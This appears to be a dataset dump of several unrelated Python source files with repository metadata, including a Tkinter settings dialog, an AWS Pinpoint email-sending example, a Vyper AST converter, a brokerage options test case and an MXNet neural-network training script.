db5fc913c50c24d9c3bb985ff8799f82103afce3 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/454/usersdata/302/106280/submittedfiles/programa.py | ca76871b6b4cba21f2e253a7a5ef79930a322905 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | # -*- coding: utf-8 -*-
# Read how many queries will be entered, collect them, then echo the list.
# Fix: the original called .append() on an int and had an unterminated
# string literal (SyntaxError).
n = int(input('Digite o número de consultas:'))
c = []
for i in range(n):
    # %d is 1-based to match the prompt shown to the user.
    c.append(int(input('Digite a consulta %d: ' % (i + 1))))
print(c)
| [
"[email protected]"
] | |
20a5737230bac56977780a12595c131b8523268d | 9fa8c280571c099c5264960ab2e93255d20b3186 | /system/scientist/panel/control/stop_criterion/view.py | 76a6fe614d545726fcac47b3131dbcdefb304689 | [
"MIT"
] | permissive | thuchula6792/AutoOED | 8dc97191a758200dbd39cd850309b0250ac77cdb | 272d88be7ab617a58d3f241d10f4f9fd17b91cbc | refs/heads/master | 2023-07-23T16:06:13.820272 | 2021-09-08T14:22:18 | 2021-09-08T14:22:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,417 | py | import tkinter as tk
from system.gui.widgets.factory import create_widget
class StopCriterionView:
    """Popup window for configuring optimization stopping criteria.

    Builds one checkbox+entry row per criterion (time, iteration count,
    sample count, hypervolume value, hypervolume convergence) plus
    Save/Cancel buttons. Widgets are exposed through self.widget for the
    controller to wire up.
    """

    def __init__(self, root_view):
        self.root_view = root_view

        self.window = create_widget('toplevel', master=self.root_view.root_view.root, title='Stopping Criterion')

        # 'var' holds the checkbox state, 'entry' the threshold input.
        self.widget = {
            'var': {},
            'entry': {},
        }

        frame_options = create_widget('frame', master=self.window, row=0, column=0, padx=0, pady=0)

        self.name_options = {'time': 'Time', 'n_iter': 'Number of iterations', 'n_sample': 'Number of samples', 'hv': 'Hypervolume value', 'hv_conv': 'Hypervolume convergence'}

        def check(var, entry):
            # Enable the entry only while its checkbox is ticked.
            if var.get() == 1:
                entry.enable()
            else:
                entry.disable()

        # One spec per criterion: (key, label suffix, entry type,
        # validation error message, optional trailing unit label).
        specs = [
            ('time', ': stop after', 'float', 'time limit must be positive', 'seconds'),
            ('n_iter', ': stop after', 'int', 'number of iterations must be positive', 'iterations'),
            ('n_sample', ': stop when number of samples reaches', 'int', 'number of samples must be positive', None),
            ('hv', ': stop when hypervolume reaches', 'float', 'hypervolume value must be positive', None),
            ('hv_conv', ': stop when hypervolume stops to improve over past', 'int', 'number of iterations must be positive', 'iterations'),
        ]
        for row, (key, label_suffix, class_type, err_msg, unit) in enumerate(specs):
            frame = create_widget('frame', master=frame_options, row=row, column=0)
            self.widget['var'][key] = tk.IntVar()
            checkbox = tk.Checkbutton(master=frame, variable=self.widget['var'][key], highlightthickness=0, bd=0)
            checkbox.grid(row=0, column=0, sticky='W')
            tk.Label(master=frame, text=self.name_options[key] + label_suffix).grid(row=0, column=1, sticky='W')
            self.widget['entry'][key] = create_widget(
                'entry', master=frame, row=0, column=2, class_type=class_type,
                required=True, valid_check=lambda x: x > 0, error_msg=err_msg, pady=0)
            if unit is not None:
                tk.Label(master=frame, text=unit).grid(row=0, column=3, sticky='W')
            # Bind key late via a default argument so each checkbox
            # toggles its own entry.
            checkbox.configure(command=lambda k=key: check(self.widget['var'][k], self.widget['entry'][k]))

        # All entries start disabled until their checkbox is ticked.
        for key in self.name_options:
            self.widget['entry'][key].disable()

        frame_action = create_widget('frame', master=self.window, row=1, column=0, pady=0, sticky=None)
        self.widget['save'] = create_widget('button', master=frame_action, row=0, column=0, text='Save')
        self.widget['cancel'] = create_widget('button', master=frame_action, row=0, column=1, text='Cancel')
"[email protected]"
] | |
0e1c84c3ad5515132006c028d0ce7d87bdfbc4e2 | c8c77f6cc6c032daf179ea2138e4dda5473b426b | /pinpoint-email/pinpoint_send_email_message_email_api.py | c607d8762534d68c7b98210c7dd0bc37ba9ccd58 | [] | no_license | arunmastermind/AWS-examples-using-BOTO3 | b411a6c96011ab58a66952a53fa2938cb58d5135 | e8390094374c10902bab016a21caba75ea179b5a | refs/heads/master | 2020-09-30T13:34:33.657621 | 2019-12-11T12:37:44 | 2019-12-11T12:37:44 | 227,297,211 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,698 | py | import boto3
from botocore.exceptions import ClientError
# The AWS Region that you want to use to send the email.
AWS_REGION = "us-west-2"

# The "From" address. This address has to be verified in
# Amazon Pinpoint in the region you're using to send email.
SENDER = "Mary Major <[email protected]>"

# The addresses on the "To" line. If your Amazon Pinpoint account is in
# the sandbox, these addresses also have to be verified.
TOADDRESSES = ["[email protected]"]

# CC and BCC addresses. If your account is in the sandbox, these
# addresses have to be verified.
CCADDRESSES = ["[email protected]", "[email protected]"]
BCCADDRESSES = ["[email protected]"]

# The configuration set that you want to use to send the email.
CONFIGURATION_SET = "ConfigSet"

# The subject line of the email.
SUBJECT = "Amazon Pinpoint Test (SDK for Python)"

# The body of the email for recipients whose email clients don't support HTML
# content. (Fix: restored the "https://" scheme that had been mangled to
# "https:#" in the message body.)
BODY_TEXT = """Amazon Pinpoint Test (SDK for Python)
-------------------------------------
This email was sent with Amazon Pinpoint using the AWS SDK for Python.
For more information, see https://aws.amazon.com/sdk-for-python/
"""

# The body of the email for recipients whose email clients can display HTML
# content. (Same URL-scheme fix as above.)
BODY_HTML = """<html>
<head></head>
<body>
<h1>Amazon Pinpoint Test (SDK for Python)</h1>
<p>This email was sent with
<a href='https://aws.amazon.com/pinpoint/'>Amazon Pinpoint</a> using the
<a href='https://aws.amazon.com/sdk-for-python/'>
AWS SDK for Python</a>.</p>
</body>
</html>
"""

# The message tags that you want to apply to the email.
TAG0 = {'Name': 'key0', 'Value': 'value0'}
TAG1 = {'Name': 'key1', 'Value': 'value1'}

# The character encoding that you want to use for the subject line and message
# body of the email.
CHARSET = "UTF-8"

# Create a new Pinpoint resource and specify a region.
client = boto3.client('pinpoint-email', region_name=AWS_REGION)

# Send the email.
try:
    # Create a request to send the email. The request contains all of the
    # message attributes and content that were defined earlier.
    response = client.send_email(
        FromEmailAddress=SENDER,
        # An object that contains all of the email addresses that you want to
        # send the message to. You can send a message to up to 50 recipients in
        # a single call to the API.
        Destination={
            'ToAddresses': TOADDRESSES,
            'CcAddresses': CCADDRESSES,
            'BccAddresses': BCCADDRESSES
        },
        # The body of the email message.
        Content={
            # Create a new Simple message. If you need to include attachments,
            # you should send a RawMessage instead.
            'Simple': {
                'Subject': {
                    'Charset': CHARSET,
                    'Data': SUBJECT,
                },
                'Body': {
                    'Html': {
                        'Charset': CHARSET,
                        'Data': BODY_HTML
                    },
                    'Text': {
                        'Charset': CHARSET,
                        'Data': BODY_TEXT,
                    }
                }
            }
        },
        # The configuration set that you want to use when you send this message.
        ConfigurationSetName=CONFIGURATION_SET,
        EmailTags=[
            TAG0,
            TAG1
        ]
    )
# Display an error if something goes wrong.
except ClientError as e:
    print("The message wasn't sent. Error message: \"" + e.response['Error']['Message'] + "\"")
else:
    print("Email sent!")
    print("Message ID: " + response['MessageId'])
"[email protected]"
] | |
89aadd7f9dd9e91da3e1da7db4d4e2395ffb8883 | 93b495b3624399c81b7edb39d1f6c5cebb2cd987 | /vyper/ast.py | 445bdf16b1ecb9ebfb855d44e98e25836353f5e9 | [
"Apache-2.0"
] | permissive | fubuloubu/vyper-redux | bf4b91d00290e5ed063ce74b44b740af6c3afae7 | a190c69083a968136ce10d1ceb68e42e41ff9de1 | refs/heads/master | 2020-12-20T16:29:44.390444 | 2020-01-25T07:53:23 | 2020-01-25T07:53:23 | 236,137,024 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,683 | py | import ast as py_ast
import inspect
import sys
from typing import (
Any,
Dict,
List,
Tuple,
Type,
Union,
)
import lark
import stringcase
class Ast(py_ast.AST):
    # Base class for all Vyper AST nodes; mirrors the stdlib `ast` API.
    # Subclasses override `_fields` with their attribute names.
    _fields = ()
class Module(Ast):
    """Root AST node: a module of methods and variables."""

    _fields = ('methods',)

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        # Peel off methods, then variables; anything left is unexpected.
        self.methods, remaining = split_ast(children, Method)
        self.variables, remaining = split_ast(remaining, Variable)
        assert len(remaining) == 0, f"Did not save everything: {remaining}"
class Method(Ast):
    """AST node for a method: decorators, name, parameters and body."""

    _fields = (
        'decorators',
        'name',
        'parameters',
        'body',
    )

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        # Decorators: at most one "decorators" subtree is expected.
        decorator_trees, children = split_tree(children, "decorators")
        assert len(decorator_trees) <= 1, "Should not have more than 1 set of decorators"
        self.decorators = decorator_trees[0].children

        # The "method_type" subtree carries the name and optional params.
        type_trees, children = split_tree(children, "method_type")
        assert len(type_trees) == 1, "Should not have more than 1 method_type"
        type_props = convert_to_dict(type_trees[0].children)
        self.name = type_props['NAME']
        self.parameters = type_props.get('parameters', None)

        # Exactly one "body" subtree must remain.
        body_trees, children = split_tree(children, "body")
        assert len(body_trees) == 1, "Should not have more than 1 body"
        self.body = body_trees[0].children

        assert len(children) == 0, f"Did not save everything: {children}"
class Decorator(Ast):
    """AST node for a single method decorator (e.g. @public)."""

    _fields = (
        'type',
    )

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        # Exactly one DECORATOR_NAME token is expected.
        assert len(children) == 1
        token = children[0]
        assert token.type == 'DECORATOR_NAME'
        self.type = token.value
class Statement(Ast):
    # Marker base class for all statement nodes.
    pass
class PassStmt(Statement):
    # A `pass` statement; carries no data of its own.
    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        pass  # NOTE: Check later for only statement in body
class ExprStmt(Statement):
    """A statement made of an assignment target and an expression."""

    _fields = (
        'assignment',
        'expression',
    )

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        assert len(children) == 2
        # Unpack in order: target first, expression second.
        self.assignment, self.expression = children
class Var(Ast):
    """A reference to a variable; its type may not be known yet at parse
    time (resolved later)."""

    _fields = ('name', 'type')

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        props = convert_to_dict(children)
        self.name = props['NAME']
        # TYPE is optional here; None means "infer/resolve later".
        self.type = props.get('TYPE')
class Variable(Ast):
    """A storage variable declaration, optionally public (getter-exposed)."""

    _fields = (
        'name',
        'type',
        'public',
    )

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        props = convert_to_dict(children)
        # A 'with_getter' wrapper marks the declaration as public; the real
        # declaration properties live one level underneath it.
        self.public = 'with_getter' in props
        if self.public:
            props = props['with_getter']
        self.name = props['NAME']
        self.type = get_type(props)
class Parameter(Variable):
    """A method parameter; structurally identical to a Variable declaration."""
    pass
class Attribute(Var):
    """An attribute access (e.g. ``self.balance``): a base var plus the
    accessed property name."""

    _fields = ('var', 'property')

    def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
        assert len(children) == 2
        base, prop_node = children
        self.var = base
        # The property side is a NAME token wrapped by the grammar rule.
        self.property = convert_to_dict(prop_node)['NAME']
def split_ast(
    nodes: List[Ast],
    ast_type: Type[Ast],
) -> Tuple[List[Ast], List[Ast]]:
    """Partition *nodes* into (instances of *ast_type*, everything else).

    Relative order within each partition follows the input list.
    """
    matched = []
    remainder = []
    for node in nodes:
        if isinstance(node, ast_type):
            matched.append(node)
        else:
            remainder.append(node)
    return matched, remainder
def split_tree(
    nodes: List[lark.Tree],
    rule_type: str,
) -> Tuple[List[lark.Tree], List[lark.Tree]]:
    """Partition *nodes* into (trees whose rule is *rule_type*, everything
    else), preserving input order within each partition."""
    matched = []
    remainder = []
    for node in nodes:
        if node.data == rule_type:
            matched.append(node)
        else:
            remainder.append(node)
    return matched, remainder
def convert_to_dict(
    node: Union[List[Union[lark.Tree, lark.Token, Ast]], Union[lark.Tree, lark.Token, Ast]],
) -> Dict:
    """Recursively convert lark Tokens/Trees into plain dicts.

    Tokens become ``{TYPE: value}``; trees become ``{rule: converted
    children}``.  A list of children is merged into a single dict when all
    keys are unique; on any key collision the un-merged list is returned
    instead.  Already-converted Ast nodes pass through unchanged.
    """
    if isinstance(node, lark.Token):
        return {node.type: node.value}
    elif isinstance(node, lark.Tree):
        return {node.data: convert_to_dict(node.children)}
    elif isinstance(node, list):
        obj = list()
        for n in node:
            attr = convert_to_dict(n)
            obj.append(attr)
        # Try to flatten the per-child dicts into one mapping.
        minified_obj = dict()
        for item in obj:
            if isinstance(item, dict) and all([k not in minified_obj.keys() for k in item.keys()]):
                minified_obj.update(item)
            else:
                return obj  # Duplicate key (or non-dict child): give up and abort the merge
        return minified_obj
    elif isinstance(node, Ast):
        return node
    else:
        raise ValueError(f"Cannot convert {node}.")
def get_type(properties: Dict[str, Any]) -> str:
    """Resolve the basic type name from a (possibly nested) property dict.

    Wrapper keys are unwrapped recursively, checked in this precedence
    order: 'storage', 'abi_type', 'memory'.  Raises ValueError when no
    BASIC_TYPE entry can be reached.
    """
    for wrapper in ('storage', 'abi_type', 'memory'):
        if wrapper in properties:
            return get_type(properties[wrapper])
    if 'BASIC_TYPE' in properties:
        return properties['BASIC_TYPE']
    raise ValueError(f"Could not process {properties}.")
def _get_ast_classes():
    """Collect every Ast subclass defined in this module, keyed by name."""
    module = sys.modules[__name__]
    return {
        name: obj
        for name, obj in inspect.getmembers(module)
        if inspect.isclass(obj) and issubclass(obj, Ast)
    }
AST_CLASSES = _get_ast_classes()
class AstConverter(lark.Transformer):
    """Lark transformer mapping each grammar rule to its Ast node class.

    Lark dispatches on snake_case rule names while the Ast classes are
    CamelCase, so each class is registered under its snake_case name.
    """

    def __init__(self, *args, **kwargs):
        for class_name, node_class in _get_ast_classes().items():
            rule_name = stringcase.snakecase(class_name)
            setattr(self, rule_name, node_class)
        super().__init__(*args, **kwargs)
class _CheckLarkConversionFailures(py_ast.NodeVisitor):
    """AST visitor that raises if any lark Tree/Token survived conversion.

    After AstConverter runs, every ``_fields`` member should hold Ast nodes
    (or plain values); a leftover lark object means some grammar rule had
    no matching Ast class.
    """
    def visit(self, node):
        node_class = node.__class__.__name__
        for member_name in node._fields:
            member = getattr(node, member_name)
            # Direct field holding an unconverted lark object.
            if isinstance(member, (lark.Tree, lark.Token)):
                raise ValueError(
                    f"Could not convert {member_name} in {node_class}: {member}"
                )
            # List-valued fields: check each element.
            if isinstance(member, list):
                for item in member:
                    if isinstance(item, (lark.Tree, lark.Token)):
                        raise ValueError(
                            f"Could not convert {member_name} in {node_class}: {item}"
                        )
        # Continue the default traversal so children get checked too.
        super().visit(node)
def ast_parse(parse_tree: lark.Tree) -> Ast:
    """Convert a lark parse tree into our Ast, verifying full conversion."""
    converted = AstConverter().transform(parse_tree)
    # Fail loudly if any lark node survived the transformation.
    _CheckLarkConversionFailures().visit(converted)
    return converted
| [
"[email protected]"
] | |
# Demo: negative-index slicing drops the last three characters.
a = '12345'
print(a[:len(a) - 3])  # -> '12'
"[email protected]"
] | |
adcc7a4f456face62e0edc4a15503cb7ef48c86e | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/XjShRightSide/YW_GGQQ_QLFXJHA_086.py | 6a72b553056082e63709d5549fef6af05775698c | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,894 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import json
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/option/service")
from OptMainService import *
from OptQueryStkPriceQty import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/option/mysql")
from Opt_SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from QueryOrderErrorMsg import queryOrderErrorMsg
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from env_restart import *
reload(sys)
sys.setdefaultencoding('utf-8')
class YW_GGQQ_QLFXJHA_086(xtp_test_case):
    """Option test case: sell-to-close (rights holder) with a limit order,
    fund check at the boundary where available funds exactly cover the fees
    (order amount < fees, and available funds == fees - order amount)."""

    def setUp(self):
        # Load the fund/asset fixture for this case, reset the SH environment,
        # and re-login so every run starts from a known state.
        sql_transfer = Opt_SqlData_Transfer()
        sql_transfer.transfer_fund_asset('YW_GGQQ_QLFXJHA_086')
        clear_data_and_restart_sh()
        Api.trade.Logout()
        Api.trade.Login()

    def test_YW_GGQQ_QLFXJHA_086(self):
        title = '卖平(权利方平仓):限价-验资(可用资金刚好)(下单金额<费用&&可用资金=(费用-下单金额))'
        # Expected outcome for this case.
        # Possible order states (dict value '期望状态'): initial, unfilled,
        # partially filled, fully filled, partial-cancel reported, partially
        # cancelled, reported-pending-cancel, cancelled, rejected,
        # cancel-rejected, internal cancel.
        # xtp_ID and cancel_xtpID default to 0 and need no change.
        case_goal = {
            '期望状态': '全成',
            'errorID': 0,
            'errorMSG': '',
            '是否生成报单': '是',
            '是否是撤废': '否',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Build the order parameters ------------------------------------------
        # Query args: ticker, market, security type, security status, trading
        # status, side (B buy / S sell), expected state, Api handle.
        stkparm = QueryStkPriceQty('10001032', '1', '*', '1', '0', '*', case_goal['期望状态'], Api)
        # If fetching the order parameters failed, the test case fails.
        if stkparm['返回结果'] is False:
            rs = {
                '用例测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            logger.error('查询结果为False,错误原因: {0}'.format(
                json.dumps(rs['测试错误原因'], encoding='UTF-8', ensure_ascii=False)))
            self.assertEqual(rs['用例测试结果'], True)
        else:
            # Order request: SH market option, limit price at the upper price
            # limit ('涨停价'), sell side, close position, quantity 2.
            wt_reqs = {
                'business_type':Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_OPTION'],
                'order_client_id':2,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
                'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_CLOSE'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
                'price': stkparm['涨停价'],
                'quantity': 2
            }
            # Initialise parameters, record the case in MySQL, then execute.
            ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
            CaseParmInsertMysql(case_goal, wt_reqs)
            rs = serviceTest(Api, case_goal, wt_reqs)
            if rs['用例测试结果']:
                logger.warning('执行结果为{0}'.format(str(rs['用例测试结果'])))
            else:
                logger.warning('执行结果为{0},{1},{2}'.format(
                    str(rs['用例测试结果']), str(rs['用例错误源']),
                    json.dumps(rs['用例错误原因'], encoding='UTF-8', ensure_ascii=False)))
            self.assertEqual(rs['用例测试结果'], True) # 4
# Allow running this test case directly as a script.
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
def multiply_x_by_y(x=10, *, y):
    """Print the product of *x* and *y*.

    FIX: the original signature ``(x=10, y)`` is a SyntaxError — a required
    positional parameter may not follow one with a default.  Making ``y``
    keyword-only keeps it required while preserving x's default value.
    """
    multiplied_value = x * y
    print(multiplied_value)
"[email protected]"
] | |
2d5241ff37c81e87fe5dde76480448e82b1a8bf5 | 2bacd64bd2679bbcc19379947a7285e7ecba35c6 | /1-notebook-examples/keras-udemy-course/ann_class2/mxnet_example.py | 9ea745fce7cb6e4c583659c52a0dfbfe86e6fcb1 | [
"MIT"
] | permissive | vicb1/deep-learning | cc6b6d50ae5083c89f22512663d06b777ff8d881 | 23d6ef672ef0b3d13cea6a99984bbc299d620a73 | refs/heads/master | 2022-12-12T15:56:55.565836 | 2020-03-06T01:55:55 | 2020-03-06T01:55:55 | 230,293,726 | 0 | 0 | MIT | 2022-12-08T05:27:43 | 2019-12-26T16:23:18 | Jupyter Notebook | UTF-8 | Python | false | false | 2,621 | py | # https://deeplearningcourses.com/c/data-science-deep-learning-in-theano-tensorflow
# https://www.udemy.com/data-science-deep-learning-in-theano-tensorflow
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
# installation is just one line:
# https://mxnet.incubator.apache.org/get_started/install.html
#
# Mac:
# pip install mxnet
#
# Linux (GPU):
# pip install mxnet-cu80
#
# Windows (a little more involved):
# https://mxnet.incubator.apache.org/get_started/windows_setup.html
import mxnet as mx
import numpy as np
import matplotlib.pyplot as plt
from util import get_normalized_data, y2indicator
# get the data, same as Theano + Tensorflow examples
# no need to split now, the fit() function will do it
Xtrain, Xtest, Ytrain, Ytest = get_normalized_data()
# get shapes
N, D = Xtrain.shape
K = len(set(Ytrain))
# training config
batch_size = 32
epochs = 15
# convert the data into a format appropriate for input into mxnet
train_iterator = mx.io.NDArrayIter(
Xtrain,
Ytrain,
batch_size,
shuffle=True
)
test_iterator = mx.io.NDArrayIter(Xtest, Ytest, batch_size)
# define a placeholder to represent the inputs
data = mx.sym.var('data')
# define the model architecture
a1 = mx.sym.FullyConnected(data=data, num_hidden=500)
z1 = mx.sym.Activation(data=a1, act_type="relu")
a2 = mx.sym.FullyConnected(data=z1, num_hidden = 300)
z2 = mx.sym.Activation(data=a2, act_type="relu")
a3 = mx.sym.FullyConnected(data=z2, num_hidden=K)
y = mx.sym.SoftmaxOutput(data=a3, name='softmax')
# train it
# required in order for progress to be printed
import logging
logging.getLogger().setLevel(logging.DEBUG)
# use mx.gpu() if you have gpu
model = mx.mod.Module(symbol=y, context=mx.cpu())
model.fit(
train_iterator, # train data
eval_data=test_iterator, # validation data
optimizer=mx.optimizer.Adam(),
eval_metric='acc', # report accuracy during training
batch_end_callback = mx.callback.Speedometer(batch_size, 100), # output progress for each 100 data batches
num_epoch=epochs,
)
# no return value
# list of optimizers: https://mxnet.incubator.apache.org/api/python/optimization.html
# test it
# predict accuracy of mlp
acc = mx.metric.Accuracy()
model.score(test_iterator, acc)
print(acc)
print(acc.get())
# currently, there is no good way to plot the training loss / accuracy history
# https://github.com/apache/incubator-mxnet/issues/2873
#
# some have suggested parsing the logs
# https://github.com/apache/incubator-mxnet/blob/master/example/kaggle-ndsb1/training_curves.py
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.